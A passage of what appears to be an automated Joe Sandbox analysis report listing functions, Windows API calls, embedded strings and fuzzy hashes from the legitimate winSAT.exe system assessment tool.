                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB1FC
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB24B
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB2CC
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB31B
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB3A5
                                                                                                                                                                                              • CompareStringW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB40C
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB451
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB49A
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB4DF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$Type$Compare
                                                                                                                                                                                              • String ID: H$H$H$H$H$H
                                                                                                                                                                                              • API String ID: 1282904382-44074236
                                                                                                                                                                                              • Opcode ID: d2860e5df567cd592f624c12676c7f443a8a43b5c3bf6dbf9d88d8eaa2dbfbe2
                                                                                                                                                                                              • Instruction ID: 0ee02e082168dfffd3f6699a84af50ab10be69a6523610cea7e2ac5274586fe5
                                                                                                                                                                                              • Opcode Fuzzy Hash: d2860e5df567cd592f624c12676c7f443a8a43b5c3bf6dbf9d88d8eaa2dbfbe2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BB18126A0C64286EB61AF5294003BDA7A0FF05B4CFA89131DE4C577CADF3DE965C720
                                                                                                                                                                                              Function 00007FF780FE1B70 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 204COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: SelectionNamespaces$base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot get a document node$cannot get owner document$cannot select nodes in an XML document$cannot set the %s document propert
                                                                                                                                                                                              • API String ID: 0-1340097815
                                                                                                                                                                                              • Opcode ID: ee123874ba9ef19f10c98c703b90a4676724e612ddcc3676dd04304a2e3e4e0e
                                                                                                                                                                                              • Instruction ID: ac94c8de15ce067156e4075b8a30cb23e545eb19a54bb5d8c86030a62fb4d392
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee123874ba9ef19f10c98c703b90a4676724e612ddcc3676dd04304a2e3e4e0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03915D36B18B46C5EB50AF26E8402B9B7A4FB49B94FA48135EE0D577A4DF3CE045C710
                                                                                                                                                                                              Function 00007FF780FD6FA0 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 180comCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CountCreateCurrentInstanceProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: %s the WinSAT Task$Enabling$WinSAT$\Microsoft\Windows\Maintenance$base\winsat\common\winsatutilities.cpp$cannot disable/enable task, failed to connect to the TaskScheduler $cannot disable/enable task, failed to create a TaskScheduler object$cannot disable/enable task, failed to get set the enable state$cannot disable/enable task, failed to get the WinSAT task$cannot disable/enable task, failed to get the root task folder$cannot get the enabled property for the task
                                                                                                                                                                                              • API String ID: 619546231-3990694131
                                                                                                                                                                                              • Opcode ID: dfa6a0e90465db53b7db4930b33e531e2f56d5b046247ff75c090a9d7564862d
                                                                                                                                                                                              • Instruction ID: fb096bb0e9291df2f1094bf69be4007038632c6dd07eea0cf9fbf54fc7758c85
                                                                                                                                                                                              • Opcode Fuzzy Hash: dfa6a0e90465db53b7db4930b33e531e2f56d5b046247ff75c090a9d7564862d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 42817D26B08B46D5EB00AF64D8442B8A360FF89B59FA08232DE0D577A4EF7CE445C750
                                                                                                                                                                                              Function 00007FF780FD2B18 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 228COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Trace$CloseOpenProcess
                                                                                                                                                                                              • String ID: > WinSAT Run Time Log from : $%u total events, %u winsat events in %s$ERROR: $base\winsat\exe\viewlog.cpp$cannot open trace file '%s'$cannot process trace file '%s'
                                                                                                                                                                                              • API String ID: 1581262263-3466886758
                                                                                                                                                                                              • Opcode ID: 1aa5b261bec6f9c1f8717be8972d4a0f65d4c3af5bf8fd7b530e42a5bce4e457
                                                                                                                                                                                              • Instruction ID: 84052e068835fc3010012e90a4488821087674ff8ff827e3f5d1876a756caa26
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1aa5b261bec6f9c1f8717be8972d4a0f65d4c3af5bf8fd7b530e42a5bce4e457
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69B1C132A1CA4281EB50EF15E8442B9B761FB95BA0FA09235EE5D07BE4DF3CE542C750
                                                                                                                                                                                              Function 00007FF780FD0DE8 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 224COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastfclosefgets$StringType_wfopenfeofmemchr
                                                                                                                                                                                              • String ID: Can't open input file '%s'$Error while reading from file%s$base\winsat\exe\textfileloader.cpp$the file name parameter is blank
                                                                                                                                                                                              • API String ID: 1146298180-1824773281
                                                                                                                                                                                              • Opcode ID: a5d997abdbf090e0c718df77b71bae92f6796c0e1cdff164775af6738c469b2d
                                                                                                                                                                                              • Instruction ID: 886601df0b953ed6610b5426b011f132cdac3c2dc8c591e051686f49cb3009e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5d997abdbf090e0c718df77b71bae92f6796c0e1cdff164775af6738c469b2d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F917E22B09A4295EB10AB22D8592BDA760FF45B94FE48631DE1E037D5DF7CE446C360
                                                                                                                                                                                              Function 00007FF780FE1E98 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 177COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: SelectionNamespaces$base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot get the root node for an XML documentt$cannot select the nodes for an XPATH expression$cannot set the %s document propert
                                                                                                                                                                                              • API String ID: 0-4173071205
                                                                                                                                                                                              • Opcode ID: 344c1d87c49b4cc25304665acb398d55c64c40e07f32c859fb482e852522e081
                                                                                                                                                                                              • Instruction ID: 70543c51a3beccafcf94f57e2108769eb1c728dfae3852d07108f5f2aab2849e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 344c1d87c49b4cc25304665acb398d55c64c40e07f32c859fb482e852522e081
                                                                                                                                                                                              • Instruction Fuzzy Hash: 21717F36608B45C6EB50DF25E8802B9B7A4FB89B94FA48235DE4E47BA4DF3CE145C710
                                                                                                                                                                                              Function 00007FF780FE22D0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 167COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: SelectionNamespaces$base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot get the root node for an XML documentt$cannot select a XML node for from an XPATH expression$cannot set the %s document propert
                                                                                                                                                                                              • API String ID: 0-3823114410
                                                                                                                                                                                              • Opcode ID: 5587ea7196948a1c137b50669420a5ca430b0fe763d3b4b66f64253761f142de
                                                                                                                                                                                              • Instruction ID: f516c75c59b80239215e9a504c3d0788cefe4d8c555c771ae2de01efe3d6a577
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5587ea7196948a1c137b50669420a5ca430b0fe763d3b4b66f64253761f142de
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52716D36619B45C6E750DF29E8802B9B7A0FB49B94FA48235DE4D47BA4EF3CE005C710
                                                                                                                                                                                              Function 00007FF780FCDC70 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135filetimeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FA941C: SetLastError.KERNEL32 ref: 00007FF780FA944C
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD45
                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD69
                                                                                                                                                                                              • SetEndOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD8E
                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDA9
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDC1
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDDC
                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE11
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE24
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE37
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE47
                                                                                                                                                                                              • GetTimeFormatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE77
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalSectionTime$BuffersCloseCreateEnterErrorFlushFormatHandleLastLeaveLocalPointerSizeWrite
                                                                                                                                                                                              • String ID: --- START %d\%d\%d %S ---$AssessmentResultsPath$\winsat.log$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 2715792050-1280026481
                                                                                                                                                                                              • Opcode ID: 97141c838bb258069ffa8586b84537cfda77fc034074ce0fa1bac6399e5eeb2e
                                                                                                                                                                                              • Instruction ID: 3f17553e01c083db53c98a87b7a0eb64a4ffeb302e8207e9837a8d53a7ce1f13
                                                                                                                                                                                              • Opcode Fuzzy Hash: 97141c838bb258069ffa8586b84537cfda77fc034074ce0fa1bac6399e5eeb2e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D614E31A08A12D6F710EB60E8512BDBB60FB85724FE09235DA5E427E4DF7CE549C760
                                                                                                                                                                                              Function 00007FF780F978E0 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 135processCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Handle$BuffCharCloseEnabledEventLowerProcessmemcpy$CountCreateCurrentDirectoryModulePathTempTickWindows_snprintf_s_vsnprintf_smemset
                                                                                                                                                                                              • String ID: Error: Failed to get a temporary filename.$Error: Failed to write temporary file to disk.$EventViewer XML is in: %ws$Events$Unable to launch %ws$WinsatEvents.xml$\system32\eventvwr.exe /v:$base\winsat\exe\main.cpp$xml
                                                                                                                                                                                              • API String ID: 3388235863-1156799286
                                                                                                                                                                                              • Opcode ID: d1a7413ee9af46f3d671843b40dadcf11f2f980e6f727eca213a842716f363ee
                                                                                                                                                                                              • Instruction ID: dc537c5519d3230a8c56216719efd9f6816b26cab97c66d7daafefe33b92f673
                                                                                                                                                                                              • Opcode Fuzzy Hash: d1a7413ee9af46f3d671843b40dadcf11f2f980e6f727eca213a842716f363ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 42614F3261CB8291E720EB11E8502EAF7A0FBC5754FA05132D64D437A9DF7CE549CB50
                                                                                                                                                                                              Function 00007FF780F9D868 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 121COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastPowerRequest$Close$ClearCreateHandleOpenQueryValue
                                                                                                                                                                                              • String ID: > Power 'execution' request successfully set.$> Power request 'execution' successfully cleared.$ERROR: Failure clearing power request. gle=0x%X$ERROR: Failure creating power request. gle=0x%X$ERROR: Failure setting power 'execution' request. gle=0x%X$PrivateError$WinSAT Execution$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1270214565-2098781763
                                                                                                                                                                                              • Opcode ID: 19c6dc01d55b9ff63c22c5e265f611d7003d0fc1af60f83bbc670fda52e359ee
                                                                                                                                                                                              • Instruction ID: e9a244f34405d5c2da79be6274c84eb084bda89a56f5186eee9bc7c12e3c3c5f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 19c6dc01d55b9ff63c22c5e265f611d7003d0fc1af60f83bbc670fda52e359ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9517026A0C64296E710BB11E8401B9B760FB89B64FF48236DA5E437D6DF7CF445C760
                                                                                                                                                                                              Function 00007FF780FE4970 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4993
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49A0
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49CF
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A0C
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A73
                                                                                                                                                                                              • _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AA6
                                                                                                                                                                                              • _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AD6
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4B00
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: QueryValue_wcsicmpmemset$CloseOpen
                                                                                                                                                                                              • String ID: AMD$AuthenticAMD$GenuineIntel$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Intel$ProcessorNameString$VendorIdentifier
                                                                                                                                                                                              • API String ID: 2975432635-611722421
                                                                                                                                                                                              • Opcode ID: e77834c250519389a48a9871e6c04fd2ffdbe520e60981df5c78ebed55393083
                                                                                                                                                                                              • Instruction ID: ed623fc2b6a7a76424aea2ff9e800832d71aa2d542d9a7a21929a2db6991bdbe
                                                                                                                                                                                              • Opcode Fuzzy Hash: e77834c250519389a48a9871e6c04fd2ffdbe520e60981df5c78ebed55393083
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF419E32A08A428AE714AF21E8005BDB7A4FF89BA4FA59135DE0E87794DF7CE445C714
                                                                                                                                                                                              Function 00007FF780F915A0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                              • String ID: WinSqmAddToStream$WinSqmEndSession$WinSqmIncrementDWORD$WinSqmSetDWORD$WinSqmSetString$WinSqmStartSession$ntdll.dll
                                                                                                                                                                                              • API String ID: 856020675-301278399
                                                                                                                                                                                              • Opcode ID: f392cd7565a561b76da92b53b3b24e83bf014fd482e2301691110f130ea9c12f
                                                                                                                                                                                              • Instruction ID: 529f9197a67ad8c99e6df25d7320ec28da4fea35addc187e29f1a6b7e5e684b6
                                                                                                                                                                                              • Opcode Fuzzy Hash: f392cd7565a561b76da92b53b3b24e83bf014fd482e2301691110f130ea9c12f
                                                                                                                                                                                              • Instruction Fuzzy Hash: D431D224D0EB0385EB44BB19B844074AAB1FF89745FF99231C84E467A0EFBDA005CB21
                                                                                                                                                                                              Function 00007FF780FE17B8 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 231comCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
